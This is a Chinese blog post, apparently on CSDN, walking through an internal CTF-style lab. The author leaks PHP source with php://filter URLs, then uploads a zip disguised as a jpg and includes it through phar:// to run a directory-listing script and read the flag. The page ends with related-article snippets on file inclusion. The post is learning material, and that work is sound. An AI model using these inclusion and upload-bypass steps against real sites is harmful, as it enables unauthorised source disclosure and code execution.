php文件包含漏洞利用

最新推荐文章于 2024-05-20 08:38:41 发布
最新推荐文章于 2024-05-20 08:38:41 发布
阅读量2.6k 收藏 2
点赞数
分类专栏: web安全 文章标签: php文件包含漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq1124794084/article/details/64437682
版权

上周我们部门弄了一个web安全的兴趣小组。说实话实在惭愧我虽然在安全公司每天都面对着各种漏洞,但是对渗透技术知之又少。于是加入兴趣小组后痛下决心好好学习渗透知识。

现在记录一下上周兴趣小组出的一个测试题目。由于0基础,花了两天时间才解决。

具体要求:读取网站根目录下的一个文本文件中的flag内容,具体的flag格式类似ahflag{xxxxxxxxxxxxxx}

好的,打开测试站点看看。

就是一个文件上传的界面。只能上传图片格式

经过各种google和百度确定解题的思路

目标:利用文件包含漏洞执行上传webshell
首先可以先down源码
http://192.168.23.250:88/index?page=php://filter/convert.base64-encode/resource=index
http://192.168.23.250:88/index?page=php://filter/convert.base64-encode/resource=upload
因为是base64的,所以百度找个base64在线解码,可以看到源码
源码中include($page.’.php’)知道不是任意文件包含,只能包含php文件。
那么我上传的jpg木马不能执行了。
所以要想办法截断后面的.php
在url加%00的办法,无效。可以知道php版本为5.4以上。
Google后得知可以通过zip和phar协议截断
尝试了phar方法。
先把test.php压缩成test.zip然后把后缀改为jpg这样可以成功上传。
然后在地址栏构造url
http://198.168.23.250:88/index.php?page=phar://./uP1O4Ds/7RmCG21sgY7CGhXbc6LyYPypoPZrFFMr_test.jpg/test
成功读取到目录文件。
Test.php文件内容
<?php
$dir="./";
$file=scandir($dir);
print_r($file);
?>
读出文件名
窗体底端
Array ( [0] => . [1] => .. [2] => CSS [3] => Y4ahs01_xs1.txt [4] => index.php [5] => uP1O4Ds [6] => upload.php )
于是htpp://192.168.23.250:88/Y4ahs01_xs1.txt获取到flag内容
ahflag{this_is_celuezu_leve1_1_2038}

黑面狐
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
31-3 文件包含漏洞 - 文件包含漏洞利用(CVE-2021-3019:Lanproxy 任意文件读取漏洞复现)
weixin_43263566的博客
03-27 398
关于 Lanproxy: Lanproxy 是一款用于实现内网穿透的工具,可以将局域网中的个人电脑或服务器代理到公网上。它支持 TCP 流量转发,并且兼容各种 TCP 上层协议,比如访问内网网站、本地支付接口调试、SSH 访问和远程桌面等功能。
PHP文件包含漏洞复现
春日野穹
09-17 2929
引言~ 老规矩,介绍一波原理先 PHP文件包含原理: 文件包含漏洞的产生原因是在通过 PHP 的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 php 中引发文件包含漏洞的通常是以下四个函数: 1、include() 当使用该函数包含文件时,只有代码执行到 include() 函数时才将文件包含进来,发生错误时只给出一个...
文件包含漏洞详解
热门推荐
m0_55854679的博客
03-12 1万+
文章目录File Inclusion(文件包含)概述漏洞产生原因漏洞特点注小知识文件包含函数includerequireinclude_oncerequire_once文件包含示例pikachu靶场本地文件包含漏洞演示pikachu靶场远程文件包含漏洞演示文件包含漏洞利用PHP伪协议(文件包含漏洞常用的利用方法)文件包含漏洞的防范措施phpMyadmin靶场练习 File Inclusion(文件包含)概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件
文件包含漏洞全面详解
qq_53058639的博客
05-20 765
和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含文件,而开发人员又没有对要包含文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。
CVE-2020-1938 Apache Tomcat 文件包含漏洞复现
weixin_43102772的博客
03-09 5212
CVE-2020-1938 Apache Tomcat 文件包含漏洞复现
php://filter协议在任意文件读取漏洞中的利用二(学习总结)
L2329794714的博客
11-12 1031
一、练习题目源码 练习题目描述: 练习任务:为获取web目录下的flag信息。 index.php 接受GET 输入str,并保存在test/test.php中,但用户输入的字符前会自动添加 exit() 退出函数,使得test.php 没机会执行用户输入的shell就退出。flag信息隐藏在flag.php中,但直接访问falg.php,被不会得到flag。 #index.php 文件 <? <?php $str="<?php ...
PHP文件包含利用phpinfo
最新发布
06-26
当遇到PHP文件包含漏洞,如果找不到可以包含文件,我们可以通过包含临时文件的方法来getshell。因为临时文件名是随机的,如果目标网站上存在phpinfo,则可以通过phpinfo来获取临时文件名,进而进行包含
Mang0-php文件包含漏洞.zip
03-12
**PHP文件包含漏洞详解** 在Web开发中,PHP是一种广泛使用的服务器端脚本语言,它提供了许多功能强大的特性,如文件包含(file inclusion)。然而,这些特性如果不慎使用,可能会导致安全问题,其中之一就是“文件...
toxin:LFI(本地文件包含漏洞利用工具
05-30
Toxin 利用特定(但也是常见)类型的本地文件包含 (LFI) 漏洞,攻击者可以利用漏洞利用 PHP 的register_globals设置。 在这种攻击场景中,攻击者会制作一个自定义的User-Agent标头,其中包含任意 PHP 代码,这些...
php包含漏洞源码
05-23
PHP包含漏洞是Web应用程序安全领域中的一个重要话题,它涉及到服务器端的编程错误,尤其是当开发者在PHP代码中不正确地处理文件包含时。这个压缩包可能包含了一个用于演示或研究PHP包含漏洞的源码实例。 PHP文件...
任意文件读取及漏洞复现
来日可期的博客
08-31 3281
任意文件上传漏洞指的是攻击者可以通过绕过应用程序的文件上传功能,向服务器上传恶意文件,包括脚本文件、木马程序等,从而执行任意代码或获取系统敏感信息。
PHP源代码漏洞分析
fencecat的博客
12-31 2216
实验项目 PHP源代码漏洞分析实验 综合性实验 2020年10月31日 一、实验综述 1.实验目的及要求 (1)掌握源代码分析的基本原理 (2)掌握RIPS源代码分析工具的使用 (3)结合源代码分析原理对DVWA平台的代码进行分析 2.实验仪器、设备或软件 Vmware station PHPstudy DVWA Windows7操作系统 3.实验原理 (1)软件漏洞: 软件漏洞分析技术主要分为:软件架构安全分析技术、源代码漏洞分析技术、二进制漏洞分析技术和运行系统漏洞分析技术四大类。...
phpmyadminV4.8.1本地文件包含漏洞复现
seek_2022的博客
07-05 2762
出于学习和技术分享的目的,本文针对phpMyadmin-v4.8.1存在的文件包含漏洞,通过代码审计结合本地搭建测试环境的方式进行漏洞复现研究,以供大家参考学习。
PHP代码注入】PHP语言常见可注入函数以及PHP代码注入漏洞利用实例
m0_64378913的博客
06-26 6856
目录1 PHP注入概述2 相关函数与语言结构2.1 eval()函数2.2 assert()函数2.3 preg_replace()函数2.4 call_user_func()函数2.5 动态函数`$a($b)`3 总结 1 PHP注入概述 RCE概念:remote command/code execute,远程命令/代码执行。 PHP代码执行:在WEB中,PHP代码执行是指应用程序过滤不严,用户可用通过请求将代码注入到应用中执行。 PHP代码注入与SQL注入比较: 其注入思想是类似的,均是构造语句绕过服务
31:WEB漏洞-文件操作之文件包含漏洞全解
mingyqf的博客
04-03 1589
31:WEB漏洞-文件操作之文件包含漏洞全解 思维导图 知识点 文件包含漏洞``原理,检测,类型,利用,修复等` `原理:将文件以脚本执行` `文件包含各个脚本代码``ASP,PHP,JSP,ASPXdeng``<!--#``include` `file=``"1.asp"` `-->``<!--#``include` `file=``"1.aspx"` `-->``<c:import url=``"http://thief.one/1.jsp"``>``<jsp
PHP代码审计6—文件包含漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
07-27 1870
文件包含漏洞整理与历史漏洞分析
本地文件包含&远程文件包含漏洞复现
weixin_45701675的博客
11-20 1265
本地文件包含与远程文件包含
PHP漏洞文件包含漏洞
dogeace的博客
11-28 1758
php语言中存在着下面几个函数存在文件包含的的功能,这些函数的本意是方便开发者及用户实现某些功能,但是如果不对文件包含的内容进行严格的的限定,会被攻击者恶意利用。这就是php文件包含漏洞。下面有四个函数可以实现文件包含分别是: 1.include();用此函数包含的时候,如果出现错误,会提出警告,跳过此步骤继续执行剩下的代码。 2.require();此函数文件包含出现错误的时候,终止程序的运行,与include()区别就是这里。 3.include_once()与1的唯一区别是文件只被包含一次,避免文
dvwa文件包含漏洞利用
07-28
DVWA文件包含漏洞利用是指利用DVWA(Damn Vulnerable Web Application)中存在的文件包含漏洞进行攻击。文件包含漏洞是一种常见的安全漏洞,它允许攻击者通过构造恶意请求来包含并执行服务器上的任意文件。 在DVWA...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值